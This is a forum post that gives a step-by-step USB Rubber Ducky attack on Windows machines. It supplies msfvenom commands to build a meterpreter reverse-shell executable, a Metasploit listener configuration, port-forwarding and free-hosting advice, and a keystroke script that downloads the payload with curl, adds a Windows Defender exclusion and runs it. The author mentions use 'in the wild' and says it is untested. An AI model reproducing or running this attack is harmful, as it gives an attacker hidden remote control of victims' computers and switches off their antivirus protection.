Jump to content

USB rubber duck (single stage) *Takes less then half a second*


Phosgene

Recommended Posts

So  the last time I did this I hosted the payload on a server on my pc, now you can just use 

port forward 8888 (If you plan on using this in the wild)

Create the payload

cd ~
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<your public ip> LPORT=8888 -f exe > exploit.exe

Host the Payload on 000webhost.com (Just make an account and upload the payload using the file manager). 

Start your listener

msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp 
set LHOST <your public ip>
set LPORT 8888
set ExitOnSession false
exploit -j -z

So this is a usb rubber ducky attacking in roughly .9 to 2.3 seconds 

NOTE: THIS REQUIRES PORT FORWARDING ( to use your ip address public ip)

ports that need to be port forwarded 8888 & 8080

Heres the setup proc: (I use parrot sec os)

Create the payload

cd ~
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<your public ip> LPORT=8888 -f exe > exploit.exe

Start the PHP server

sudo php -S 0.0.0.0:8080 -t ~

Start your listener

msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp 
set LHOST <your public ip>
set LPORT 8888
set ExitOnSession false
exploit -j -z

Heres The Ducky Script

DELAY 350 
GUI r 
DELAY 100
STRING cmd /c "curl -o 'C:\users\exploit.exe' 'https:URL\exploit.exe' && powershell Add-MpPreference -ExclusionPath 'C:\users' && C:\users\exploit.exe"
ENTER

Please comment if there are any problems I Havent tested this yet! But it practically happens instantly............

Link to comment
Share on other sites

Archived

This topic is now archived and is closed to further replies.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...